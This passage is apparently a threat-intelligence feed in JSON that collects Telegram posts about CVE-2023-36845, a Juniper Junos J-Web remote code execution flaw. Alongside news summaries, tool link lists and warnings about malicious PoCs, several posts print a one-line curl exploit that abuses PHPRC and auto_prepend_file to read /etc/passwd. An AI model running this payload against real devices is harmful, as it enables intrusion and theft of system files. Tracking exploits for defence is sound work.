\u043c\u043e\u0436\u043d\u043e \u0438 \u0432 curl\u044b\u043a\n*\ncurl -kv \"https ://OLOLO.com/about.php? PHPRC=/dev/fd/0\" --data-binary 'auto_prepend_file=\"/etc/passwd\"'", "creation_timestamp": "2024-04-19T21:20:03.000000Z"}, {"uuid": "69c9f8d3-7996-4881-99ea-dffb74033d42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/openSource3/76", "content": "CVE ID : CVE-2023-36845\nsytem : Juniper Networks Junos OS\nType : RCE\n\nExploit \u0627\u0644\u0627\u0633\u063a\u0644\u0627\u0644:\ncurl -kv \"https ://exmple.com/about.php?PHPRC=/dev/fd/0\" --data-binary 'auto_prepend_file=\"/etc/passwd\"'\n\n#\u0627\u0633\u062a\u063a\u0644\u0627\u0644_\u062b\u063a\u0631\u0629", "creation_timestamp": "2024-04-23T11:05:07.000000Z"}, {"uuid": "b72b43ca-59a2-4194-a661-a77bbcf111d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://t.me/arpsyndicate/1823", "content": "#ExploitObserverAlert\n\nCVE-2023-36845\n\nDESCRIPTION: Exploit Observer has 87 entries related to CVE-2023-36845. A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series   and SRX Series   allows an unauthenticated, network-based attacker to remotely execute code.  Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.   This issue affects Juniper Networks Junos OS on EX Series   and    SRX Series:      *  All versions prior to   20.4R3-S9;   *  21.1 versions 21.1R1 and later;   *  21.2 versions prior to\u00a021.2R3-S7;   *  21.3 versions prior to\u00a021.3R3-S5;   *  21.4 versions prior to 21.4R3-S5;   *  22.1 versions   prior to   22.1R3-S4;   *  22.2 versions   prior to   22.2R3-S2;   *  22.3 versions   prior to   22.3R2-S2, 22.3R3-S1;   *  22.4 versions   prior to   22.4R2-S1, 22.4R3;   *  23.2 versions prior to 23.2R1-S1, 23.2R2.\n\nFIRST-EPSS: 0.693120000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-16T13:27:25.000000Z"}, {"uuid": "c358e93a-1002-4b14-851d-edcedbb95452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://t.me/arpsyndicate/1778", "content": "#ExploitObserverAlert\n\nCVE-2023-36845\n\nDESCRIPTION: Exploit Observer has 87 entries related to CVE-2023-36845. A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series   and SRX Series   allows an unauthenticated, network-based attacker to remotely execute code.  Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.   This issue affects Juniper Networks Junos OS on EX Series   and    SRX Series:      *  All versions prior to   20.4R3-S9;   *  21.1 versions 21.1R1 and later;   *  21.2 versions prior to\u00a021.2R3-S7;   *  21.3 versions prior to\u00a021.3R3-S5;   *  21.4 versions prior to 21.4R3-S5;   *  22.1 versions   prior to   22.1R3-S4;   *  22.2 versions   prior to   22.2R3-S2;   *  22.3 versions   prior to   22.3R2-S2, 22.3R3-S1;   *  22.4 versions   prior to   22.4R2-S1, 22.4R3;   *  23.2 versions prior to 23.2R1-S1, 23.2R2.\n\nFIRST-EPSS: 0.693120000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-12T00:45:41.000000Z"}, {"uuid": "753a7ea1-a016-4db1-8643-560c8fedd299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "Telegram/rdm5aVfSzfde8pPzzEXUUBzO86L6KoNpjVmR8oLFxjyclA", "content": "", "creation_timestamp": "2023-09-19T12:38:58.000000Z"}, {"uuid": "57393f9f-e85a-4653-b280-49cddef659e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1545", "content": "Seeing some Go PoC with obfuscated / malicious code. Be safe out there!\n\n1. \nhttps://github.com/meekchest/cve-2023-36845-scanner/blob/master/scan.go\n\n2. \nhttps://github.com/internalwhel/rapidresetclient/blob/master/main.go", "creation_timestamp": "2025-02-26T04:01:38.000000Z"}, {"uuid": "b081e615-618b-4964-83a4-b4c62ec8bb73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/KomunitiSiber/809", "content": "Over 12,000 Juniper Firewalls Found Vulnerable to Recently Disclosed RCE Vulnerability\nhttps://thehackernews.com/2023/09/over-12000-juniper-firewalls-found.html\n\nNew research has found that close to 12,000 internet-exposed Juniper firewall devices are vulnerable to a recently disclosed remote code execution flaw.\nVulnCheck, which\u00a0discovered\u00a0a new exploit for CVE-2023-36845, said it could be\u00a0exploited\u00a0by an \"unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system.\"\nCVE-2023-36845 refers to a", "creation_timestamp": "2023-09-19T12:26:01.000000Z"}, {"uuid": "2838cdef-7325-40c9-a066-07cc13e1fbc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "Telegram/dkxB3yNasTV2nnby0yGIeEfvEQ0j97pj5WFC2YsD2kZioxQ", "content": "", "creation_timestamp": "2025-02-25T10:00:05.000000Z"}, {"uuid": "2792641d-6794-450c-a419-53e6b34fb545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/GhostPrincess/12995", "content": "Juniper Web Device Manager - RCE\nCVE-2023-36845\n\ncurl \"http://xxxx:xxxx/?PHPRC=/dev/fd/0\" --data-binary 'auto_prepend_file=\"/etc/passwd\"' -X POST\n\n#bugbounty #bugbountytips #bugbountytip #rce #juniper", "creation_timestamp": "2023-09-28T00:15:15.000000Z"}, {"uuid": "d72bc516-2c9e-432e-81a2-73762365514b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/leak_db2/953", "content": "\u2b55\ufe0fJuniper Web Device Manager - RCE\nCVE-2023-36845\n\n\ncurl \"http://xxxx:xxxx/?PHPRC=/dev/fd/0\" --data-binary 'auto_prepend_file=\"/etc/passwd\"' -X POST\n\nNuceli Template :\nhttps://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu", "creation_timestamp": "2023-09-27T21:34:42.000000Z"}, {"uuid": "5d7264bb-254b-448e-8f12-b77fd634a615", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/4241", "content": "Seeing some Go PoC with obfuscated / malicious code. Be safe out there!\n\n1. https://github.com/meekchest/cve-2023-36845-scanner/blob/master/scan.go\n2. https://github.com/internalwhel/rapidresetclient/blob/master/main.go\n\n#HackersFactory", "creation_timestamp": "2025-03-25T12:56:04.000000Z"}, {"uuid": "2246af5c-007d-4f92-bae6-11cd5977ee85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3198", "content": "Hackers Factory \n\nA tool to discover Juniper firewalls vulnerable to CVE-2023-36845\n\nhttps://github.com/vulncheck-oss/cve-2023-36845-scanner\n\nCentralized resource for listing and organizing known injection techniques and POCs\n\nhttps://github.com/itaymigdal/awesome-injection\n\nTemplate Nuclei SSTI\n\nhttps://github.com/HernanRodriguez1/ScanReflectedSSTI\n\nA fast method to intercept syscalls from any user-mode process using InstrumentationCallback and detect any process using InstrumentationCallback.\n\nhttps://github.com/keowu/InstrumentationCallbackToolKit\n\nYet Another Memory Analyzer for malware detection\n\nhttps://github.com/t-tani/YAMA-dev\n\nInteractive Shell and Command Execution over Named-Pipes (SMB)\n\nhttps://github.com/Leo4j/Invoke-SMBRemoting\n\nAn EVM Jump-Oriented Programming Puzzle in SECCON CTF 2023 Quals\n\nhttps://github.com/minaminao/tokyo-payload\n\nInvictus-AWS is a python script that will help automatically enumerate and acquire relevant data from an AWS environment. The tool doesn't require any installation it can be run as a standalone script with minimal configuration required.\u00a0\n\nhttps://github.com/invictus-ir/Invictus-AWS\n\nThis repository provides penetration testers and red teams with an extensive collection of dynamic templates designed specifically for use with Evilginx3.\n\nhttps://github.com/simplerhacking/Evilginx3-Phishlets\n\nA lightweight protocol implementation to perform TCP and authentication proxying over websockets.\n\nhttps://github.com/skelsec/wsnet\n\nDigital Forensics and Incident Response (DFIR)\n\nhttps://github.com/RENANZG/My-Forensics\n\nA sample client/server architecture\n\nhttps://github.com/realoriginal/ghost\n\nA class to emulate the behavior of NtQuerySystemInformation when passed the SystemHypervisorDetailInformation information class\n\nhttps://github.com/matterpreter/cpuid\n\n#infosec #cybersecurity #hackersfactory \n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-09-21T09:31:16.000000Z"}, {"uuid": "293e5e52-ed79-41a0-a8ce-1130c5bc8aa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3197", "content": "Hackers Factory \n\nBruteforces Fortinet SSL VPNs\n\nhttps://github.com/ill5-com/fortinet-ssl-vpn-bruteforce\n\nVcenter\u7efc\u5408\u6e17\u900f\u5229\u7528\u5de5\u5177\u5305 | Vcenter Comprehensive Penetration and Exploitation Toolkit\n\nhttps://github.com/W01fh4cker/VcenterKit\n\nA python script to extract all endpoints and URLs from wp-json url\n\nhttps://github.com/0xElkot/wp-json-extractor\n\nBridge between mattermost, IRC, gitter, xmpp, slack, discord, telegram, rocketchat, twitch, ssh-chat, zulip, whatsapp, keybase, matrix, microsoft teams, nextcloud, mumble, vk and more with REST API (mattermost not required!)\n\nhttps://github.com/42wim/matterbridge\n\nPoC auto collect from GitHub. \u26a0\ufe0f Be careful Malware.\n\nhttps://github.com/nomi-sec/PoC-in-GitHub\n\nA cheat sheet that contains common enumeration and attack methods for Windows Active Directory.\n\nhttps://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet\n\nDocker containers vulnerability scan\n\nhttps://github.com/arminc/clair-scanner\n\nHashKitty is a user-friendly Python wrapper for Hashcat designed to provide an easy password cracking experience for both beginners and experienced users.\n\nhttps://github.com/brandonscholet/HashKitty\n\nA list of cyber-chef recipes and curated links\n\nhttps://github.com/mattnotmax/cyberchef-recipes\n\nA tool to discover Juniper firewalls vulnerable to CVE-2023-36845\n\nhttps://github.com/vulncheck-oss/cve-2023-36845-scanner\n\n#infosec #cybersecurity #hackersfactory \n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-09-20T06:40:57.000000Z"}, {"uuid": "5fe36313-69b9-4a6b-9242-3d65ce9def48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3169", "content": "Hackers Factory \n\nlazy way to create CVE-2023-38831 winrar file for testing\n\nhttps://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc\n\nCVE-2022-39986 PoC\n\nhttps://github.com/WhiteOwl-Pub/RaspAP-CVE-2022-39986-PoC\n\nCommunity curated list of nuclei templates for finding \"unknown\" security vulnerabilities.\n\nhttps://github.com/projectdiscovery/fuzzing-templates\n\nHVCI-loldrivers-check\nChecks to see which drivers from loldrivers.io are not blocked by the current HVCI blocklist on the system.\n\nhttps://github.com/trailofbits/HVCI-loldrivers-check\n\nGolang Secure Coding Practices guide\n\nhttps://github.com/OWASP/Go-SCP\n\n#exploit\n1. CVE-2023-36844, CVE-2023-36845,\nCVE-2023-36846, CVE-2023-36847:\nRCE in Juniper JunOS within SRX/EX Series products\n\nhttps://github.com/watchtowrlabs/juniper-rce_cve-2023-36844\n\n2. CVE-2023-41080:\nApache Tomcat FORM Authentication redirect\n\nhttps://github.com/shiomiyan/CVE-2023-41080\n\nEvolutionary encryption framework based on scalable complexity over time.\n\nhttps://github.com/jofpin/temcrypt\n\nSome of my rough notes for Docker threat detection\n\nhttps://github.com/Antonlovesdnb/DockerDetectionNotes\n\nBash Script to extract GNU/Linux forensic artifacts for digital forensic analysis and incident response.\n\nhttps://github.com/ozpingux/BasicLinuxForensicScript\n\nyou want an #investigation on user accounts,  \n\nSnoop, a #cli #python #tool, scans various sites, forums, and social networks for the presence of the username.\n\ngithub.com/snooppr/snoop\n\n#infosec #cybersecurity #hackersfactory\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-08-27T17:49:56.000000Z"}, {"uuid": "3370ecfb-2ea1-40bb-bb51-9562634550c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/ICyberDefence/249", "content": "https://vulncheck.com/blog/juniper-cve-2023-36845", "creation_timestamp": "2023-09-20T00:19:42.000000Z"}, {"uuid": "a0a07269-7e38-49c4-af18-038aa3824552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/ICyberDefence/248", "content": "https://github.com/vulncheck-oss/cve-2023-36845-scanner", "creation_timestamp": "2023-09-20T00:19:24.000000Z"}, {"uuid": "2b7533bc-9d31-4402-a72b-fac70d6b4a91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1903", "content": "CVE-2023-36845 \u0438 CVE-2023-36846\nJuniper Junos OS J-Web RCE\n*\n\u041d\u0430 \u0432\u0441\u0435 \u044d\u0442\u043e \u0434\u0435\u043b\u043e \u0435\u0441\u0442\u044c \u0438 \u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 \u043f\u0438\u0442\u043e\u043d\u0435\n\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0438 \u0432 curl\u044b\u043a\n*\ncurl -kv \"https ://OLOLO.com/about.php? PHPRC=/dev/fd/0\" --data-binary 'auto_prepend_file=\"/etc/passwd\"'", "creation_timestamp": "2024-02-13T15:34:51.000000Z"}, {"uuid": "b4c808c4-df15-4c54-9a5e-ebcb6b1584da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "Telegram/IS6cLh6RhuZxj-El9-k98eHShKFBSGOxSG0VTECyG5AHWbk", "content": "", "creation_timestamp": "2023-09-27T05:23:05.000000Z"}, {"uuid": "8fc7ebe9-bcdc-4aa1-be3e-aeb53af436d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "https://t.me/true_secator/4862", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 VulnCheck \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u043e\u043a\u043e\u043b\u043e 12 000 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u043e\u0432 Juniper SRX \u0438 \u043a\u043e\u043c\u043c\u0443\u0442\u0430\u0442\u043e\u0440\u043e\u0432 EX \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u0415\u0449\u0435 \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435\u00a0Juniper \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430\u00a0\u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u043c\u0438 \u0441\u0440\u0435\u0434\u044b PHP (CVE-2023-36844/CVE-2023-36845) \u0438 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 (CVE-2023-36846/CVE-2023-36847), \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0430\u043c\u0438 \u043f\u043e \u0441\u0435\u0431\u0435 \u0438\u043c\u0435\u043b\u0438 \u043e\u0446\u0435\u043d\u043a\u0443 5,3. \u041d\u043e \u0432 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u044d\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u0442\u0430\u043b\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0441 \u0440\u0435\u0439\u0442\u0438\u043d\u0433\u043e\u043c 9,8.\n\n\u0412 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0435\u043c \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435\u00a0watchTowr Labs \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 PoC, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u043b \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 CVE-2023-36845 \u0438 CVE-2023-36846, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044f \u0434\u0432\u0430 \u0444\u0430\u0439\u043b\u0430 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e.\n\n\u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 VulnCheck \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0435\u0449\u0435 \u043e\u0434\u0438\u043d PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e CVE-2023-36845, \u043c\u0438\u043d\u0443\u044f \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u044f \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043c\u043d\u043e\u0433\u043e\u044d\u0442\u0430\u043f\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0432 \u043f\u0440\u043e\u0441\u0442\u043e\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0434\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b curl \u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u0441\u0442\u0430\u0440\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u043b\u0438\u044f\u043d\u0438\u0435 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0431\u0448\u0438\u0440\u043d\u0435\u0435 \u0438 \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0435\u0435, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u043d\u044b\u0439 \u0441\u0440\u0435\u0434\u043d\u0438\u0439 \u0440\u0435\u0439\u0442\u0438\u043d\u0433 CVSS, \u0432 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0447\u0435\u043c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u0434\u043e\u043b\u0436\u043d\u044b \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u044f\u0442\u044c \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044e \u0441\u0432\u043e\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c \u043d\u0430 GitHub \u0441\u043a\u0430\u043d\u0435\u0440\u043e\u043c \u0434\u043b\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0439 \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435, \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u043d\u0430\u0448\u043b\u0438 14 951 Juniper \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c\u0438 \u0438\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430\u043c\u0438.\n\n\u0418\u0437 \u043d\u0438\u0445 79% \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0438 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0438\u0434\u0435\u0430\u043b\u044c\u043d\u044b\u043c \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u043c \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u00ab\u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043c\u0443\u0434\u0430\u043a\u043e\u0432\u00bb, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0447\u0430\u0441\u0442\u0443\u044e \u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044e \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u0441\u0435\u0442\u044c.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0435\u0449\u0435 17 \u0430\u0432\u0433\u0443\u0441\u0442\u0430 2023 \u0433\u043e\u0434\u0430, \u0430 Shadowserver \u0438 GreyNoise \u0443\u0436\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u044e\u0442, \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b\u0438 \u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2023-36845 \u0432 \u00ab\u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u043c\u0443\u0434\u0430\u043a\u0430\u00bb.", "creation_timestamp": "2023-09-19T14:30:05.000000Z"}, {"uuid": "619f1f59-5fb7-430d-978f-a126a782203b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "https://t.me/true_secator/4783", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 watchTowr Labs \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 